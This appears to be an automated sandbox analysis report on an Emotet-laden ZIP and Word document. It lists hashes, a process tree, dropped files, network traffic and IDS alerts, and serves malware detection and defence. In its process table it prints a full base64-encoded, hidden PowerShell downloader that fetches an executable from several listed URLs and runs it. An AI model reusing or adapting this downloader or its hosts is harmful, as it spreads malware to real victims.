File name: | 519151c96a283d0c4de78e62bcc60533.zip |
Full analysis: | https://app.any.run/tasks/02787b0b-1881-4536-9852-3c1c4a7dceec |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | November 17, 2019, 00:02:47 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/zip |
File info: | Zip archive data, at least v2.0 to extract |
MD5: | 1D5619DA6155C1500A8799AFD3042C91 |
SHA1: | 6FCF27BD20615EB2F24E7319ECDCE40546B709C6 |
SHA256: | FABFCA8CB61E48C8848B04002B817EF1B4E001FEFEE40F52A881BAA80BE367A5 |
SSDEEP: | 3072:/zGJzmF9HLSh85GTq91BTKod6C+9WcKDGUPpdA73Jh0WKlPp1Y:/z99rW85GTCBma+UaUPM1DKJ4 |
.zip | | | ZIP compressed archive (100) |
---|
ZipRequiredVersion: | 20 |
---|---|
ZipBitFlag: | 0x0009 |
ZipCompression: | Deflated |
ZipModifyDate: | 2019:11:15 10:40:15 |
ZipCRC: | 0xba58db94 |
ZipCompressedSize: | 131249 |
ZipUncompressedSize: | 203804 |
ZipFileName: | 519151c96a283d0c4de78e62bcc60533 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2416 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\519151c96a283d0c4de78e62bcc60533.zip" | C:\Program Files\WinRAR\WinRAR.exe | — | explorer.exe |
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Version: 5.60.0 | ||||
1412 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\519151c96a283d0c4de78e62bcc60533.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3792 | powershell -w hidden -enco JABFAHAAdQBkAHQAcQB5AGEAZAB3AD0AJwBWAGoAawBmAHYAeAB0AGwAcwB2AGQAZwBwACcAOwAkAEcAeQBxAHIAbwByAHkAaQBmAGoAeQBrACAAPQAgACcAOQA1ADYAJwA7ACQAVgB2AGcAegB2AGkAawBzAHAAaQBiAG0APQAnAFYAdABiAHMAdwBwAHkAegBuACcAOwAkAEYAagBoAHYAcABoAGsAbAB2AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABHAHkAcQByAG8AcgB5AGkAZgBqAHkAawArACcALgBlAHgAZQAnADsAJABBAHQAagBsAG4AbgB1AHUAZgBlAGgAPQAnAEEAbgB6AHIAcQBtAHYAZwByAG0AegBrACcAOwAkAEgAcABtAHgAaQB0AGgAawBsAGEAYgA9ACYAKAAnAG4AZQB3AC0AbwAnACsAJwBiAGoAZQBjACcAKwAnAHQAJwApACAATgBFAHQALgB3AGUAYgBjAGwASQBlAE4AdAA7ACQAQQBkAHEAeQBzAHAAZwBzAD0AJwBoAHQAdABwADoALwAvAHcAdwB3AC4AbgBlAHMAdABiAGwAbwBvAG0ALgB0AHcALwB3AHAALQBpAG4AYwBsAHUAZABlAHMALwBqAGcAOQAyADAAOQB0AHQAYgAtAGUAYgBzAGgAaAA5AGwAbAAtADEAMwA0ADYALwAqAGgAdAB0AHAAcwA6AC8ALwB0AGgAZQB3AGEAcgByAG8AbwBtAC4AcwBoAG8AdwAvAHcAcAAtAGEAZABtAGkAbgAvAGgAcgBzADQAMQBpAG4AbgA0AC0AMQB3AGEAZQBvAGIAMQAwADcALQAxADcAMgAvACoAaAB0AHQAcABzADoALwAvAGwAaQBnAGgAdABzAGMAYQBmAGUALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAEMAUwBmAEMAUABoAEkALwAqAGgAdAB0AHAAOgAvAC8AZgB0AHAAbQBzAGEALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAGkAVQBZAFcAZQBVAEoALwAqAGgAdAB0AHAAcwA6AC8ALwB4AHkAcwBoAGIAawAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAHcAeQBvAGwAYgA0AC0AcgAzAGEAeAA5AGcAdABrAGMAZwAtADYAMQAxAC8AJwAuACIAUwBgAFAAbABpAHQAIgAoACcAKgAnACkAOwAkAEMAaAB1AHcAaABmAGkAdQBvAGEAaABiAHUAPQAnAE4AYgBuAGQAagBzAGkAcABnAGoAYgBnACcAOwBmAG8AcgBlAGEAYwBoACgAJABaAHQAdAB5AGUAcQB1AGIAIABpAG4AIAAkAEEAZABxAHkAcwBwAGcAcwApAHsAdAByAHkAewAkAEgAcABtAHgAaQB0AGgAawBsAGEAYgAuACIAZABgAG8AdwBOAGwAbwBhAEQAYABGAGkATABlACIAKAAkAFoAdAB0AHkAZQBxAHUAYgAsACAAJABGAGoAaAB2AHAAaABrAGwAdgApADsAJABIAGoAYQBpAHAAcgBuAGwAaQBhAD0AJwBGAHoAeQBrAG8AcgBvAG8AZQBsACcAOwBJAGYAIAAoACgALgAoACcARwBlAHQAJwArACcALQBJAHQAJwArACcAZQBtACcAKQAgACQARgBqAGgAdgBwAGgAawBsAHYAKQAuACIAbABgAGUAYABOAGcAVABIACIAIAAtAGcAZQAgADIAOQA3ADAAMgApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBzAFQAYABBAFIAVAAiACgAJABGAGoAaAB2AHAAaABrAGwAdgApADsAJABGAHUAcgBvAG0AZwB5AHkAbABoAHIAZwB0AD0AJwBGAGMAcwBuAHMAYQBtAGoAcgB2AHUAJwA7AGIAcgBlAGEAawA7ACQAVwBlAHYAeAB0AGwAawB4AHYAeAB2AHQAPQAnAFQAcgBoAGQAdgBtAHkAaQBjAHQAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAVgBzAGsAegBzAHMAeABmAGIAZwBsAD0AJwBIAHUAcwBqAGUAdwB0AGcAcABzAHIAJwA= | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2260 | "C:\Users\admin\956.exe" | C:\Users\admin\956.exe | — | powershell.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
2256 | --37547278 | C:\Users\admin\956.exe | 956.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
2196 | "C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe" | C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe | — | 956.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
1536 | --d6864438 | C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe | — | serialfunc.exe |
User: admin Integrity Level: MEDIUM |
PID | Process | Filename | Type | |
---|---|---|---|---|
2416 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DRb2416.190\519151c96a283d0c4de78e62bcc60533 | — | |
MD5:— | SHA256:— | |||
1412 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR52E8.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3792 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\JOU56J5V873IOM60JM0H.temp | — | |
MD5:— | SHA256:— | |||
1412 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\354514A0.wmf | wmf | |
MD5:171303DC3930EB190A479F0BF168DC51 | SHA256:D13FBD6D2845C86A10606DBBEA213C877FA2A91CFAE062F3AB80CEB92FCF2AEE | |||
3792 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:35375F3D71AE42AA9777154D256B33BF | SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF | |||
1412 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7A93014.wmf | wmf | |
MD5:A3FD11D57534C005278F8253C9F5A070 | SHA256:E68D01289B6A47B9711D87842D278B358ED600DFC0CBB41B9F2BFF03C1680FCD | |||
1412 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\18A5E796.wmf | wmf | |
MD5:CAC34AA383C4B1324D9501FAF6472157 | SHA256:7484554AD5E5016FB2F1EF334E5911FF6CCF75631EBF05B860C5E6D50CEB0BC6 | |||
1412 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2C715342.wmf | wmf | |
MD5:0A6E23C95BA9C5562814462340730E3D | SHA256:002A1474CAC1AD926D0CCCE118676729A1C52A2279AC48315A406C208176C76F | |||
1412 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | |
MD5:539725821C2778DB09CDC8B1F0A1B7C0 | SHA256:6BF60AF34F220A77232A500E230B2AD60A6FE264282029FDA4B7D3E8C999AD07 | |||
1412 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:305C648BF28A8D36B309D77BBEFD9C1E | SHA256:00627E7EF37CDD7C929338D3631A0C5EDA1C1551B5878AAD802238768FC7D4D4 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3792 | powershell.exe | GET | 200 | 35.240.206.54:80 | http://www.nestbloom.tw/wp-includes/jg9209ttb-ebshh9ll-1346/ | US | executable | 232 Kb | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3792 | powershell.exe | 35.240.206.54:80 | www.nestbloom.tw | — | US | suspicious |
Domain | IP | Reputation |
---|---|---|
www.nestbloom.tw |
| suspicious |
PID | Process | Class | Message |
---|---|---|---|
3792 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3792 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
3792 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |